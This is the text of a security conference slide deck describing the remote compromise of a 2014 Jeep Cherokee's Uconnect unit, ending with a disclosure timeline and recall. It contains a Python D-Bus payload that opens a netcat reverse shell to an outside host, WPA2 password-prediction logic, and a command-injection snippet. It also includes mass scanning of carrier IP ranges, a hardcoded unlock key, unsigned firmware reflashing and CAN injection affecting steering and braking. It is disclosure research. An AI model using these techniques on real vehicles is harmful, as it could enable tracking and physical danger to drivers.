remote exploitation of an unaltered passenger vhicle€¦ · remote exploitation of an unaltered...

Remote Exploitation of an Unaltered Passenger Vehicle

Dr. Charlie Miller ([email protected])

Chris Valasek ([email protected])

mailto:[email protected]

mailto:[email protected]

Introduction

You should know us by now…

Dr. Charlie Miller [Twitter]

Security Engineer@0xcharlie

Chris Valasek [IOActive]

Director of Vehicle Security Research@nudehaberdasher

Disclaimer

• Enjoy the talk• The full details will be in our 90

page white paper

• To be released Aug 10

Public service announcement

Please STOP saying UNHACKABLE,

you’re going to look silly

Overview

• Introduction

• Getting remote code running via Wi-Fi

• Expanding to cellular

• Head unit payloads

• Flashing CAN chip

• Cyberphysical payloads

Remote Attacks

Remote Attack Paradigm

TPMS

Telematics (CDMA/3G/4G/LTE)

Bluetooth

Wi-Fi

In-car apps

1. Remote compromise

Remote keyless entry


Running exploit

CAN / LIN / MOST / Flexray

1. Remote compromise2. Lateralization


Engine

Sensors

Occupant safety

Power Steering

Self-Parking

Radio

Transmission

ABS


1. Remote compromise2. Lateralization3. CAN Message analysis (in

advance)


Pre-Collision System

Self-Parking

Adaptive Cruise Control


1. Remote compromise2. Lateralization3. CAN Message analysis (in

advance)4. CAN message injection

• Reprogram firmware• Functionality

Running exploit

The Vehicle

2014 Jeep Cherokee

http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg

http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg

Uconnect 8.4AN RA4 (Harman Kardon)

Uconnect 8.4AN RA4 (Harman Kardon)

# pidin info

CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014

Processes: 107, Threads: 739

Processor1: 1094697090 Cortex A8 800MHz FPU

Jail Break

Jailbreaking the Uconnect• Was NOT required

for remote exploit

• Was invaluable for gaining knowledge about the OS / services

• NOT, I repeat, NOT needed for remote exploitation

Problems with attacks over Wi-Fi• Not on by default

• Need to connect to WPA2 network

WPA2 passwordchar *get_password(){

int c_max = 12;int c_min = 8;

unsigned int t = time(NULL);srand (t);unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;char *password = malloc(len);int v9 = 0; do{

unsigned int v10 = rand();int v11 = convert_byte_to_ascii_letter(v10 % 62);password[v9] = v11;v9++;

} while (len > v9);return password;

Password guessing

• Password based on when unit was first started• With second precision

• We know the year, if you guess the month• 15 million password possibilities

• If you supposed it was during the day• 7 million password possibilities

• Should be possible to brute force in under an hour

Setting the time…local rtcTime = getV850RealtimeClock()

local rtcValid = false

if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or

rtcTime.hour == 255 or rtcTime.mi n == 255 or rtcTime.sec == 255 then

dbg.print("Clock: start -- V850 time not received or is set to factory defaults")

...

if rtcValid == false then

dbg.print("Clock: start -- Unable to create the UTC time from V850")

setProperty("timeFormat24", false)

setProperty("enableClock", true)

setProperty("gpsTime", true)

setProperty("manualUtcOffset", 0)

defTime = {}

defTime.year = 2013

defTime.month = 1

defTime.day = 1

defTime.hour = 0

defTime.min = 0

defTime.sec = 0

defTime.isdst = false

setSystemUTCTime(os.time(defTime))

timeFormatOverride = false

enableClockOverride = false

end

Actually its easy!

• My WPA2 password was “TyYMxfPhZxkp”

• This corresponds to Epioch time 0x50e22720

• This is Jan 01 2013 00:00:32 GMT

• Took 32 seconds for WifiSvc to get started up

• Really only a few dozen passwords to try

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDTNmap scan report for 192.168.5.1Host is up (0.0036s latency).PORT STATE SERVICE2011/tcp open raid-cc2021/tcp open servexec4400/tcp open unknown6010/tcp open x116020/tcp open unknown6667/tcp open irc51500/tcp open unknown65200/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

http://nmap.org

D-Bus: Overview

• Interprocess communications

• Can require authentication• Jeep did NOT

• We used Dfeet to look at services

• Dbus-Python for scripts / exploits

telnet 192.168.5.1 6667Trying 192.168.5.1...

Connected to 192.168.5.1.

Escape character is '^]'.

AUTH ANONYMOUS

OK

4943a53752f52f82a9ea4e6e00000001

BEGIN

D-Bus: Services & Methods

D-Bus: Command Line Injection

function methods.rmTrack(params, context)

return {

result = os.execute("rm \"" .. trail_path_saved ..

params.filename .. "\"")

}

end

NavTrailService

* Many others contained command line injection vulnerabilities

D-Bus: No vulnerability neededNavTrailService

"com.harman.service.NavTrailService":

{"name":"com.harman.service.NavTrailService",

"methods":{"symlinkattributes":"symlinkattributes","getProperties":"getPro

perties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"

ls","attributes":"attributes“ …

#!python

import dbus

bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")

proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavT

railService')

playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')

print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat

192.168.5.109 6666"}')

We basically revealed the vulnerability last year!

Uconnect Payloads

GPS Tracker 3000 #!python

import dbus

bus_obj=dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")

proxy_object=bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')

print playerengine_iface.Invoke('JSON_GetProperties','{"inprop":["SEN_GPSInfo"]}')

HVACrequire "service"

params = {}control = {}params.zone = "front"control.fan = arg[1]params.controls = control

x=service.invoke("com.harman.service.HVAC","setControlProperties", params)

Radio Volume

require "service"

params = {}params.volume = tonumber(arg[1])x=service.invoke("com.harman.service.AudioSettings", "setVolume", params)

Cellular Exploitation

Netstat Review

# netstat -n | grep LISTEN

tcp 0 0 *.6010 *.* LISTEN

tcp 0 0 *.2011 *.* LISTEN

tcp 0 0 *.6020 *.* LISTEN

tcp 0 0 *.2021 *.* LISTEN

tcp 0 0 127.0.0.1.3128 *.* LISTEN

tcp 0 0 *.51500 *.* LISTEN

tcp 0 0 *.65200 *.* LISTEN

tcp 0 0 *.4400 *.* LISTEN

tcp 0 0 *.6667 *.* LISTEN

Finding the Jeep’s IP

# ifconfig

lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192

inet 127.0.0.1 netmask 0xff000000

pflog0: flags=100<PROMISC> mtu 33192

uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500

address: 30:14:4a:ee:a6:f8

media: <unknown type> autoselect

inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255

ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472

inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000

Femto-Cell Comms

• Airave 2.0 • We bought 2 ‘stolen’ ones

before getting a working device (Thanks Ebay!)

• Public Jailbreak (turns on port 23)

• Successful in communicating w/ the Jeep!

• Range ~ 30m

How far?

Long Distance Communications (Sprint)

Searching for Vehicles$ bin/masscan 21.0.0.0/8 –p6667

$ bin/masscan 25.0.0.0/8 –p6667

Discovered open port 6667/tcp on 25.18.2.211










Gathering Vehicle Information

./shutupdave.py

Scanning 21.18.23.0...

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT

-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth

Initiating SYN Stealth Scan

Scanning 256 hosts [1 port/host]

Scan complete

Found 2 hosts

21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND

21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN

…

Vehicles Located via Scanning

2013 DODGE VIPER2013 RAM 15002013 RAM 25002013 RAM 35002013 RAM CHASSIS 55002014 DODGE DURANGO2014 DODGE VIPER2014 JEEP CHEROKEE2014 JEEP GRAND CHEROKEE2014 RAM 15002014 RAM 25002014 RAM 35002014 RAM CHASSIS 55002015 CHRYSLER 2002015 JEEP CHEROKEE2015 JEEP GRAND CHEROKEE

Vehicle Estimates

• We found 19 duplicate VINs in a scan of 2694

vehicles

• Estimated 381,980 +/- 89,393

• We now know that the real number is 1.4

million. We obviously went with a conservative

estimate

Uconnect firmware (v850)

Now we send CAN messages?

Inside Uconnect

CANSPI

Inside the Uconnect

Updating the V850: Firmware

# iocupdate -c 4 -p usr/share/V850/cmcioc.bin

• V850 firmware is NOT signed

• No code signing mechanism present

• Updating only works if v850 in “bootrom” mode

V850 Internals: CAN Modules & Addressing

http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp

V850 Internals: CAN Registers

http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp

V850 Internals: Base Address

V850 Internals: Segments & Initial Values

V850 Internals: CAN Data Buffer XREFs

V850 Internals: Setting CAN Data Values

V850 Internals: SPI Parser

file = '/dev/ipc/ch7'

g = assert(ipc.open(file))

f = assert(io.open(file, "r+b"))

g:write(0xf0, 0x02)

bytes = f:read(0x18)

print(hex_dump(bytes))

g:close()

f:close()

V850 Internals: SPI Memory Corruption Bugs

V850 Internals: Sending Arbitrary CAN Msgs

USB-less upgrade

• To flash v850, it needs to be in bootrom mode

• If you put it in bootrom mode, it restarts OMAP in upgrade mode• Attacker loses control

• Initial bootup code runs from read-only filesystem

• Calls “hd” application which lives in writable portion of filesystem

• Replace hd with your code that can run while v850 in bootrom mode

Make a mistake?

Exploit Chain

Step 1: Find IP address of a vehicle

Step 2: Get code running on OMAP chip

Step 3: Reflash the v850,Reboot

Step 4: Send arbitrary CANmessages

Cyber Physical Internals

wiTECH: Overview

wiTECH: Security Unlocks

wiTECH: SecurityAccess

Uc.init(“G3n3r@ti0n”, “MD5”, “”, “BC”, “AES”, new String[]

{“com.chrysler.lx.UnlockCryptographerTest”,

"com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", “”,

“com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest”})

;

PAM: Checksums

Jeep Checksums

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9

IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09

Prius Checksums

IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83

IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85

IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89

PAM: Device

PAM: Checksum Code

Capturing CAN messages

This year…METAL

Cyber Physical action!

Normal CAN messages - example

wipers

Turn signals

speedometer

Diagnostic CAN messages

Diagnostic + Normal CAN messages

Us

Target ECUNormal

source of traffic

Shut down source

Us

Target ECUNormal

source of traffic

Become the source!

Us

Target ECUNormal

source of traffic

steering

Braking

Disclosure

Disclosure Timeline

• Oct 24, 2014 -> Vulnerabilities disclosed to FCA

• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely

• Apr 10, 2015 -> Full scope of hack disclosed

• May 12, 2015 -> FCA informed of cellular vector confirmation

• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation

• Jul 16, 2015 -> FCA given pre-release copy of our paper/research

• Jul 16, 2015 -> FCA releases Uconnect patch

• Jul 20, 2015 -> Wired article/video

• Jul 24, 2015 -> Sprint network blocks port 6667 traffic

• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack

Additional testing?

Impact

Wired story

Recall

stagefright

Twitter

Conclusion

Conclusions

• Remote compromise of a connected vehicle is possible• This is NOT just a FCA issue. More connectivity requires more security

• These issues are a combination of: OEMs, Tier-1s, Telecom

• Take this information and look at other cars• We’re just two bros with one car

• What might be considered an ‘air-gap’ may not be one in reality• Cellular->Uconnect->Reprogram Firmware->SPI

• Architecture can introduce more hurdles

• Hackers now have an example of making real-world impact

Questions?

remote exploitation of an unaltered passenger vhicle€¦ · remote exploitation of an unaltered...

Documents